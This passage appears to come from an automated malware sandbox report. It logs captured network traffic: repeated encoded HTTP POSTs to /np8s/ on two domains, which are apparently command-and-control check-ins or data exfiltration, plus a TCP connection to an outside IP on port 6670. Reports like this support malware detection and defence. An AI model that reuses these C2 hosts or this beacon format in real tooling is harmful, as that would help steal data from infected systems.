50 45 44 77 46 4e 6b 33 58 76 63 4d 4f 5a 34 34 4b 45 5f 62 4e 71 37 78 54 73 34 6d 6d 36 70 6f 41 43 79 56 36 7e 6e 54 56 62 47 35 5a 66 4c 44 5a 36 31 67 63 38 71 5a 51 6e 36 33 72 54 4b 43 49 31 32 67 62 46 61 64 61 33 53 72 64 71 45 54 79 42 49 6b 4d 6f 64 4b 32 6a 73 6d 75 45 4d 79 4a 49 78 5a 63 58 43 57 6f 70 35 78 70 33 4e 6f 62 73 2d 4b 37 43 34 4f 6b 31 50 62 63 58 2d 64 7a 65 70 52 33 6c 53 72 52 57 4c 71 72 4e 2d 77 4d 42 38 45 59 72 63 5a 63 44 55 34 6d 35 73 62 54 73 48 72 42 57 34 53 38 44 6b 43 38 53 62 43 30 44 75 4e 7a 67 43 4d 64 54 78 6c 42 48 47 77 75 51 6c 6a 50 34 6c 76 76 6e 48 6b 55 53 4f 6d 59 65 75 61 6d 6a 49 66 32 66 4a 47 79 56 57 79 41 6e 59 66 47 4c 46 4e 74 30 76 49 33 6c 50 4e 35 44 67 57 6c 74 76 53 4e 49 47 61 46 72 6d 64 46 30 70 55 62 52 68 31 4e 45 7a 67 47 34 66 48 75 42 4b 6f 5a 28 79 4b 61 73 66 4d 46 68 77 4d 78 78 44 67 6e 42 69 46 4c 74 70 39 38 6f 6a 70 37 46 32 51 54 59 73 56 64 6c 48 6b 6f 6c 44 66 4b 32 74 63 54 31 58 4c 79 4e 4e 59 59 4c 64 32 78 6f 70 6c 61 57 72 34 6d 48 72 47 30 56 45 55 51 74 44 49 69 42 7a 50 30 6a 4c 4c 39 73 4b 58 4e 31 62 44 39 76 64 54 71 77 53 70 38 51 7a 4e 57 48 59 4c 6f 42 52 72 4f 70 79 75 36 57 4e 71 41 30 77 4c 5a 41 31 52 71 7a 38 6b 79 4a 39 7a 53 72 33 79 48 30 77 30 74 30 54 38 71 37 38 59 62 46 4b 43 7a 62 49 4d 59 38 37 43 6d 38 43 4a 62 5a 43 59 63 35 45 47 45 74 6d 67 4b 59
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.getbusinesscreditandfunding.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getbusinesscreditandfunding.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 37 72 64 58 7e 50 67 4f 4b 39 5a 4d 4b 38 4c 33 34 6a 6a 70 28 58 71 57 4e 59 56 34 68 46 49 57 6a 57 70 7a 75 61 57 4a 47 72 50 32 58 56 56 43 62 71 76 77 6d 6d 4a 67 39 5f 47 42 4b 42 67 6c 30 64 4c 55 70 6b 59 42 79 67 74 65 38 6a 7a 41 58 31 6c 70 68 63 70 72 7a 4d 28 5f 59 6b 61 36 72 4f 4f 73 39 65 6b 4c 32 76 52 79 46 39 36 61 75 2d 51 38 61 46 77 78 66 6d 65 63 65 63 52 46 76 67 69 78 57 6b 47 6b 62 58 64 50 69 2d 38 53 68 58 35 6e 56 65 76 77 67 75 32 37 6d 5f 79 77 4d 32 31 6f 51 48 66 6c 70 69 35 50 79 59 73 56 50 30 4c 51 57 43 70 2d 61 6c 54 44 5a 46 62 4c 72 57 4f 63 6c 79 6f 49 68 53 55 4d 4a 2d 35 69 4b 63 34 53 66 4b 51 34 47 67 54 34 43 48 53 59 62 39 56 44 61 37 4b 79 48 57 63 50 37 74 28 78 33 30 38 6f 70 63 6a 58 37 41 65 69 78 54 47 6f 52 31 4a 49 45 79 42 38 65 31 5a 71 5a 50 56 49 4e 32 67 4d 72 4f 43 58 67 61 76 78 42 34 66 69 39 4d 30 70 33 49 52 39 38 43 65 65 52 6c 39 74 47 62 6b 6c 73 79 32 36 47 41 34 4a 70 5a 61 36 78 5a 34 7a 70 4e 78 70 71 73 6e 69 47 47 62 77 39 4e 28 4e 31 38 74 6f 62 46 77 67 4d 46 30 52 4c 4e 34 44 37 66 32 64 38 71 63 44 4c 70 55 5a 58 38 73 48 43 7a 6c 4e 50 71 69 32 55 38 72 6f 79 4a 65 49 73 52 72 76 6c 70 49 6e 51 68 4c 62 45 44 52 33 6c 52 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fk4oN=7rdX~PgOK9ZMK8L34jjp(XqWNYV4hFIWjWpzuaWJGrP2XVVCbqvwmmJg9_GBKBgl0dLUpkYBygte8jzAX1lphcprzM(_Yka6rOOs9ekL2vRyF96au-Q8aFwxfmececRFvgixWkGkbXdPi-8ShX5nVevwgu27m_ywM21oQHflpi5PyYsVP0LQWCp-alTDZFbLrWOclyoIhSUMJ-5iKc4SfKQ4GgT4CHSYb9VDa7KyHWcP7t(x308opcjX7AeixTGoR1JIEyB8e1ZqZPVIN2gMrOCXgavxB4fi9M0p3IR98CeeRl9tGbklsy26GA4JpZa6xZ4zpNxpqsniGGbw9N(N18tobFwgMF0RLN4D7f2d8qcDLpUZX8sHCzlNPqi2U8royJeIsRrvlpInQhLbEDR3lRM.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.getbusinesscreditandfunding.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getbusinesscreditandfunding.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 37 72 64 58 7e 4b 68 46 41 73 46 46 50 73 4f 6e 36 57 48 39 33 45 79 51 4c 6f 68 39 39 30 49 7a 30 58 34 45 71 62 6e 37 48 71 32 78 54 6c 35 6a 66 70 66 6f 6d 69 46 46 7a 74 69 64 5a 52 73 71 30 5a 76 2d 70 6b 63 42 7a 67 30 62 28 45 33 6d 58 58 39 71 73 63 70 58 79 4d 7e 38 4f 6d 7e 62 72 4f 37 4c 39 65 63 62 32 65 39 79 45 66 43 61 6f 39 34 33 48 31 78 62 42 33 79 51 42 73 63 70 76 6b 32 35 57 6b 4b 6b 62 6e 52 50 6a 65 4d 4e 32 41 46 6d 59 75 76 70 6c 75 33 72 39 76 50 57 4d 32 78 4b 51 47 7a 6c 71 51 64 50 79 49 4d 56 59 33 7a 54 59 53 70 5f 65 6c 54 53 64 46 65 4e 72 58 69 51 6c 33 45 32 68 67 49 4d 49 4f 35 76 49 37 45 72 56 37 52 75 4c 41 50 66 43 48 65 39 62 73 49 63 61 2d 79 53 48 67 59 30 6c 34 4c 4c 33 32 52 5f 76 38 6a 54 7a 67 65 35 78 54 47 4d 52 31 4a 32 45 79 52 38 65 32 70 71 49 65 6c 49 64 57 67 4c 6e 4f 43 53 6f 36 76 69 4d 59 6a 43 39 4d 73 66 33 4a 70 54 37 77 65 65 52 32 56 74 41 36 6b 6d 31 53 32 38 44 41 34 70 74 5a 61 6c 78 5a 34 42 70 4d 78 35 71 37 76 69 63 33 62 77 35 76 48 4e 6c 63 74 6f 65 46 77 69 46 6c 35 55 4c 4e 51 48 37 65 47 6a 38 35 77 44 4c 37 4d 5a 57 64 73 48 46 44 6c 4e 41 4b 6a 6f 61 5a 62 6a 78 4f 33 2d 69 67 37 5a 6d 72 6b 54 61 57 28 54 57 52 34 74 35 6d 38 39 4e 2d 32 54 74 73 43 34 79 68 41 69 35 6c 45 49 79 77 47 76 35 4d 7a 69 33 49 49 52 47 53 34 33 7e 5a 6c 47 54 46 57 72 47 36 45 7a 4d 71 36 4a 63 62 53 36 6c 67 4d 7a 6a 41 71 34 28 4f 53 58 68 47 51 6f 7e 4b 31 43 73 55 4f 57 55 67 45 6e 6d 41 4e 63 46 51 6f 37 59 33 48 73 58 58 76 64 6d 6b 55 58 4c 58 48 51 67 51 61 49 56 4d 30 50 59 59 54 77 7e 39 36 73 77 69 73 79 74 72 42 71 4a 43 4d 5a 59 6c 6b 54 44 4f 73 30 41 35 5a 59 69 51 6e 73 58 67 48 6b 34 47 63 36 6e 56 6d 42 31 31 52 58 63 6c 68 2d 34 70 6e 76 68 4d 36 64 58 4f 41 79 4e 42 46 5a 79 49 66 36 6d 52 50 77 58 61 37 71 32 74 61 5f 62 4a 5a 51 6d 32 41 65 6b 65 39 43 38 6a 32 66 61 65 42 5a 76 46 6b 74 49 70 43 39 68 62 32 74 45 57 64 66 78 6e 4b 39 76 6b 34 4b 49 6d 5a 79 70 42 30 74 5a 31 55 75 47 70 68 46 54 58 72 4d 39 47 53 42 61 70 43 57 35 58 65 47 4c 4d 35 6f 38 2d 41 31 30 61 43 61 67 57 50 70 59 7a 50 78 66 50 33 6a 39 52 45 50 28 62 28 48 63 72 76 41 49 5a 41 50 4c 52 52 43 6a 61 61 79 76 43 61 58 77 64 38 31 62 56 68 4a 5a 69 77 5f 78 52 64 70 6a 6e 32 57 35 68 4b 2d 56 74 4b 54 6e 73 7a 4d 70 43 43 56 71 33 7a 4c 74 79 64 38 41 30 43 4b 6a 31 4c 68 28 6f 68 68 6e 56 49 75 4e 76 6f 45 4f 52 67 72 75 76 50 64 33 63 47 39 66 55 4a 4e 41 56 52 78 4e 76 68 6a 6b 6b 6c 35 63 79 46 35 4e 36 57 33 67 75 68 57
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.getbusinesscreditandfunding.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getbusinesscreditandfunding.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 37 72 64 58 7e 50 67 4f 4b 39 5a 4d 4b 38 4c 33 34 6a 6a 70 28 58 71 57 4e 59 56 34 68 46 49 57 6a 57 70 7a 75 61 57 4a 47 72 50 32 58 56 56 43 62 71 76 77 6d 6d 4a 67 39 5f 47 42 4b 42 67 6c 30 64 4c 55 70 6b 59 42 79 67 74 65 38 6a 7a 41 58 31 6c 70 68 63 70 72 7a 4d 28 5f 59 6b 61 36 72 4f 4f 73 39 65 6b 4c 32 76 52 79 46 39 36 61 75 2d 51 38 61 46 77 78 66 6d 65 63 65 63 52 46 76 67 69 78 57 6b 47 6b 62 58 64 50 69 2d 38 53 68 58 35 6e 56 65 76 77 67 75 32 37 6d 5f 79 77 4d 32 31 6f 51 48 66 6c 70 69 35 50 79 59 73 56 50 30 4c 51 57 43 70 2d 61 6c 54 44 5a 46 62 4c 72 57 4f 63 6c 79 6f 49 68 53 55 4d 4a 2d 35 69 4b 63 34 53 66 4b 51 34 47 67 54 34 43 48 53 59 62 39 56 44 61 37 4b 79 48 57 63 50 37 74 28 78 33 30 38 6f 70 63 6a 58 37 41 65 69 78 54 47 6f 52 31 4a 49 45 79 42 38 65 31 5a 71 5a 50 56 49 4e 32 67 4d 72 4f 43 58 67 61 76 78 42 34 66 69 39 4d 30 70 33 49 52 39 38 43 65 65 52 6c 39 74 47 62 6b 6c 73 79 32 36 47 41 34 4a 70 5a 61 36 78 5a 34 7a 70 4e 78 70 71 73 6e 69 47 47 62 77 39 4e 28 4e 31 38 74 6f 62 46 77 67 4d 46 30 52 4c 4e 34 44 37 66 32 64 38 71 63 44 4c 70 55 5a 58 38 73 48 43 7a 6c 4e 50 71 69 32 55 38 72 6f 79 4a 65 49 73 52 72 76 6c 70 49 6e 51 68 4c 62 45 44 52 33 6c 52 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fk4oN=7rdX~PgOK9ZMK8L34jjp(XqWNYV4hFIWjWpzuaWJGrP2XVVCbqvwmmJg9_GBKBgl0dLUpkYBygte8jzAX1lphcprzM(_Yka6rOOs9ekL2vRyF96au-Q8aFwxfmececRFvgixWkGkbXdPi-8ShX5nVevwgu27m_ywM21oQHflpi5PyYsVP0LQWCp-alTDZFbLrWOclyoIhSUMJ-5iKc4SfKQ4GgT4CHSYb9VDa7KyHWcP7t(x308opcjX7AeixTGoR1JIEyB8e1ZqZPVIN2gMrOCXgavxB4fi9M0p3IR98CeeRl9tGbklsy26GA4JpZa6xZ4zpNxpqsniGGbw9N(N18tobFwgMF0RLN4D7f2d8qcDLpUZX8sHCzlNPqi2U8royJeIsRrvlpInQhLbEDR3lRM.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.getbusinesscreditandfunding.comConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.getbusinesscreditandfunding.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.getbusinesscreditandfunding.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 37 72 64 58 7e 4b 68 46 41 73 46 46 50 73 4f 6e 36 57 48 39 33 45 79 51 4c 6f 68 39 39 30 49 7a 30 58 34 45 71 62 6e 37 48 71 32 78 54 6c 35 6a 66 70 66 6f 6d 69 46 46 7a 74 69 64 5a 52 73 71 30 5a 76 2d 70 6b 63 42 7a 67 30 62 28 45 33 6d 58 58 39 71 73 63 70 58 79 4d 7e 38 4f 6d 7e 62 72 4f 37 4c 39 65 63 62 32 65 39 79 45 66 43 61 6f 39 34 33 48 31 78 62 42 33 79 51 42 73 63 70 76 6b 32 35 57 6b 4b 6b 62 6e 52 50 6a 65 4d 4e 32 41 46 6d 59 75 76 70 6c 75 33 72 39 76 50 57 4d 32 78 4b 51 47 7a 6c 71 51 64 50 79 49 4d 56 59 33 7a 54 59 53 70 5f 65 6c 54 53 64 46 65 4e 72 58 69 51 6c 33 45 32 68 67 49 4d 49 4f 35 76 49 37 45 72 56 37 52 75 4c 41 50 66 43 48 65 39 62 73 49 63 61 2d 79 53 48 67 59 30 6c 34 4c 4c 33 32 52 5f 76 38 6a 54 7a 67 65 35 78 54 47 4d 52 31 4a 32 45 79 52 38 65 32 70 71 49 65 6c 49 64 57 67 4c 6e 4f 43 53 6f 36 76 69 4d 59 6a 43 39 4d 73 66 33 4a 70 54 37 77 65 65 52 32 56 74 41 36 6b 6d 31 53 32 38 44 41 34 70 74 5a 61 6c 78 5a 34 42 70 4d 78 35 71 37 76 69 63 33 62 77 35 76 48 4e 6c 63 74 6f 65 46 77 69 46 6c 35 55 4c 4e 51 48 37 65 47 6a 38 35 77 44 4c 37 4d 5a 57 64 73 48 46 44 6c 4e 41 4b 6a 6f 61 5a 62 6a 78 4f 33 2d 69 67 37 5a 6d 72 6b 54 61 57 28 54 57 52 34 74 35 6d 38 39 4e 2d 32 54 74 73 43 34 79 68 41 69 35 6c 45 49 79 77 47 76 35 4d 7a 69 33 49 49 52 47 53 34 33 7e 5a 6c 47 54 46 57 72 47 36 45 7a 4d 71 36 4a 63 62 53 36 6c 67 4d 7a 6a 41 71 34 28 4f 53 58 68 47 51 6f 7e 4b 31 43 73 55 4f 57 55 67 45 6e 6d 41 4e 63 46 51 6f 37 59 33 48 73 58 58 76 64 6d 6b 55 58 4c 58 48 51 67 51 61 49 56 4d 30 50 59 59 54 77 7e 39 36 73 77 69 73 79 74 72 42 71 4a 43 4d 5a 59 6c 6b 54 44 4f 73 30 41 35 5a 59 69 51 6e 73 58 67 48 6b 34 47 63 36 6e 56 6d 42 31 31 52 58 63 6c 68 2d 34 70 6e 76 68 4d 36 64 58 4f 41 79 4e 42 46 5a 79 49 66 36 6d 52 50 77 58 61 37 71 32 74 61 5f 62 4a 5a 51 6d 32 41 65 6b 65 39 43 38 6a 32 66 61 65 42 5a 76 46 6b 74 49 70 43 39 68 62 32 74 45 57 64 66 78 6e 4b 39 76 6b 34 4b 49 6d 5a 79 70 42 30 74 5a 31 55 75 47 70 68 46 54 58 72 4d 39 47 53 42 61 70 43 57 35 58 65 47 4c 4d 35 6f 38 2d 41 31 30 61 43 61 67 57 50 70 59 7a 50 78 66 50 33 6a 39 52 45 50 28 62 28 48 63 72 76 41 49 5a 41 50 4c 52 52 43 6a 61 61 79 76 43 61 58 77 64 38 31 62 56 68 4a 5a 69 77 5f 78 52 64 70 6a 6e 32 57 35 68 4b 2d 56 74 4b 54 6e 73 7a 4d 70 43 43 56 71 33 7a 4c 74 79 64 38 41 30 43 4b 6a 31 4c 68 28 6f 68 68 6e 56 49 75 4e 76 6f 45 4f 52 67 72 75 76 50 64 33 63 47 39 66 55 4a 4e 41 56 52 78 4e 76 68 6a 6b 6b 6c 35 63 79 46 35 4e 36 57 33 67 75 68 57
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.xn--wsthof-camping-gsb.comConnection: closeContent-Length: 416Cache-Control: no-cacheOrigin: http://www.xn--wsthof-camping-gsb.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.xn--wsthof-camping-gsb.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 36 50 59 59 32 35 41 38 67 69 31 56 50 41 78 37 71 38 71 74 49 58 58 64 72 4f 73 39 35 50 68 32 58 64 62 7a 44 72 76 2d 6e 75 58 48 7e 68 55 51 4c 59 6e 6d 54 67 36 6a 69 38 74 4f 6f 6f 35 75 36 46 70 62 6b 6c 38 74 7a 47 62 35 61 4b 77 58 66 74 70 39 57 6e 30 4f 49 70 33 48 47 4c 79 76 69 73 4e 6a 56 33 57 41 74 55 6f 38 66 4e 31 72 75 6d 71 54 32 76 71 78 49 6b 79 6e 28 71 4d 38 72 77 77 44 6f 4c 73 4a 67 4d 33 32 37 79 73 45 45 41 36 69 57 4c 6e 4b 55 78 65 75 6c 65 6b 71 43 4b 51 76 59 30 4b 74 5a 56 4a 74 58 4e 57 42 50 7a 46 76 76 4b 38 69 51 48 61 63 76 79 6e 32 41 37 41 70 52 6d 7e 56 72 49 4c 33 32 71 46 44 6e 57 6b 77 31 51 59 74 42 5f 68 4d 78 33 4b 74 7e 6e 36 52 46 4c 74 57 68 31 53 37 36 2d 39 51 75 7a 62 70 34 34 53 5a 42 57 33 64 58 49 46 65 62 31 30 35 30 70 45 41 5a 48 66 62 38 72 71 47 51 78 70 47 49 6e 52 79 62 31 43 6f 65 31 6a 48 52 76 62 50 57 6a 51 49 71 52 6e 36 63 48 66 5f 73 6a 7e 6e 28 6b 68 66 33 6c 79 4e 28 51 4b 46 62 4f 4c 7a 73 5a 4c 4e 4b 4d 58 75 52 36 74 31 7e 34 54 6c 57 57 6c 6b 73 78 67 73 6b 4a 78 72 34 48 75 72 6f 78 44 41 37 62 74 41 37 59 6a 48 73 4d 4a 48 79 4d 64 49 44 77 68 78 4e 39 75 6f 43 34 35 78 4b 35 54 5a 41 62 4e 75 30 4e 4b 39 46 4d 4a 6b 51 74 45 2e 00 00 00 00 00 00 00 00 Data Ascii: 3fk4oN=6PYY25A8gi1VPAx7q8qtIXXdrOs95Ph2XdbzDrv-nuXH~hUQLYnmTg6ji8tOoo5u6Fpbkl8tzGb5aKwXftp9Wn0OIp3HGLyvisNjV3WAtUo8fN1rumqT2vqxIkyn(qM8rwwDoLsJgM327ysEEA6iWLnKUxeulekqCKQvY0KtZVJtXNWBPzFvvK8iQHacvyn2A7ApRm~VrIL32qFDnWkw1QYtB_hMx3Kt~n6RFLtWh1S76-9Quzbp44SZBW3dXIFeb1050pEAZHfb8rqGQxpGInRyb1Coe1jHRvbPWjQIqRn6cHf_sj~n(khf3lyN(QKFbOLzsZLNKMXuR6t1~4TlWWlksxgskJxr4HuroxDA7btA7YjHsMJHyMdIDwhxN9uoC45xK5TZAbNu0NK9FMJkQtE.
Source: global traffic HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.xn--wsthof-camping-gsb.comConnection: closeContent-Length: 36488Cache-Control: no-cacheOrigin: http://www.xn--wsthof-camping-gsb.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.xn--wsthof-camping-gsb.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 33 66 6b 34 6f 4e 3d 36 50 59 59 32 38 34 32 6c 54 59 4a 46 77 4e 59 74 4f 61 35 52 30 66 66 6e 65 6f 69 6e 2d 68 54 54 6f 28 4e 65 5f 6a 70 32 63 47 43 7a 78 4a 77 42 2d 33 49 54 68 4b 5a 6f 5a 46 4b 69 6f 6c 74 36 42 4e 35 6b 6c 34 74 79 47 7a 70 61 73 68 4d 62 34 31 79 51 48 31 31 5a 5a 32 5a 43 4b 76 39 69 73 59 32 56 33 65 51 74 45 38 38 65 76 64 72 6f 6e 72 66 34 76 72 34 41 45 43 37 37 71 51 68 72 7a 41 62 6f 4f 55 4a 68 38 4c 32 36 54 63 62 54 54 69 6c 4a 37 6e 4c 52 78 66 36 73 37 38 2d 43 4b 45 52 59 32 4f 74 5a 6d 74 74 57 63 32 42 62 51 74 73 33 4b 38 6e 55 48 61 62 72 79 72 6e 41 37 63 31 52 6b 53 76 72 35 28 33 33 61 46 43 67 46 31 4e 77 48 4e 72 48 5f 46 72 78 33 50 78 7e 32 6d 7a 46 4b 41 33 32 58 62 50 7e 63 45 46 75 31 43 79 36 59 53 6e 4b 32 33 43 58 49 46 2d 62 31 30 48 30 70 30 41 5a 46 28 62 7e 4f 4f 47 53 42 70 48 55 58 52 39 44 6c 43 6e 61 31 76 65 52 76 53 77 57 68 52 64 71 6a 48 36 63 55 6e 5f 38 79 7e 67 33 55 68 6a 37 46 7a 4b 37 51 4c 4c 62 4f 4c 46 73 64 66 64 4a 39 48 75 58 2d 35 31 7a 36 37 6c 55 6d 6c 6b 69 52 67 75 76 70 39 37 34 48 32 56 6f 77 7a 32 34 71 6c 41 7e 65 33 48 73 70 39 48 7a 63 64 49 59 41 67 50 4f 38 66 77 48 61 46 32 42 37 7a 76 64 35 6c 6b 75 38 48 78 47 70 4e 42 4b 36 59 50 67 70 30 4b 45 51 57 57 39 77 50 31 64 71 75 77 6c 5a 4d 6d 56 30 49 34 28 6e 50 56 5a 4d 44 69 77 47 43 76 6d 32 6a 54 55 34 73 58 49 4c 66 53 67 7a 65 44 57 64 64 5f 71 6a 48 73 44 36 6b 42 36 33 61 53 35 73 53 37 4d 4e 31 48 7e 70 31 31 78 67 6d 7a 56 56 33 69 6c 6f 43 5f 7a 63 64 62 41 41 48 57 41 35 46 61 4a 75 59 46 31 6a 72 65 68 30 58 4e 4d 79 67 78 4b 31 77 4c 5a 66 42 53 4f 2d 6e 79 5a 76 43 56 6e 37 43 54 6f 58 38 59 78 75 71 33 67 50 63 36 70 75 55 4a 6b 46 45 52 48 53 56 6b 52 70 44 51 4a 68 59 73 66 76 4c 54 61 54 50 75 75 44 36 71 32 62 45 49 32 7a 30 6c 31 6b 56 57 61 39 70 73 72 65 69 61 74 6e 67 59 74 59 33 47 6b 33 4d 34 52 71 30 2d 28 32 47 47 74 79 31 50 69 35 4d 68 51 4f 76 30 6c 4d 57 44 56 6a 50 52 78 61 74 5a 58 34 48 72 57 4a 54 36 69 65 43 75 62 74 49 4c 4f 78 49 36 41 65 53 47 48 70 39 6d 66 49 52 49 7e 46 73 6c 41 75 78 39 57 48 70 63 67 36 41 47 5a 6c 41 42 74 34 39 64 59 57 77 75 39 39 39 4d 28 6f 4f 74 38 47 71 49 6e 42 67 59 30 73 68 78 6e 54 70 4b 35 39 4a 76 39 7a 55 72 6b 64 34 46 6c 61 54 30 5a 4f 62 57 58 57 48 64 5a 68 59 46 57 5a 62 66 4f 59 70 39 38 56 43 74 67 73 38 52 39 5a 7a 4e 4d 64 57 4e 6d 4f 32 34 33 6d 7a 69 50 6c 5a 78 58 67 4e 76 59 32 76 6c 37 6c 6b 79 32 4a 55 35 6b 50 79 4b 4f 41 44 6a 67 71 43 31 49 6d 7a 47 4b 2d 76 75 63 37 56 62 79
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49722 -> 91.193.75.133:6670
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 17:04:30 GMTServer: Apache/2.4.29 (Ubuntu)Content-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 74 6f 70 69 6e 67 73 33 33 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.topings33.com Port 80</address></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 27 May 2022 17:05:12 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 9X-Rate-Limit-Reset: 2022-05-27T17:05:17.4029455Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 27 May 2022 17:05:12 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 9X-Rate-Limit-Reset: 2022-05-27T17:05:17.4548107Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 27 May 2022 17:05:12 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 8X-Rate-Limit-Reset: 2022-05-27T17:05:17.4029455Z
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 17:05:51 GMTServer: Apache/2.4.53 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 27 May 2022 17:05:51 GMTServer: Apache/2.4.53 (Unix)Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not 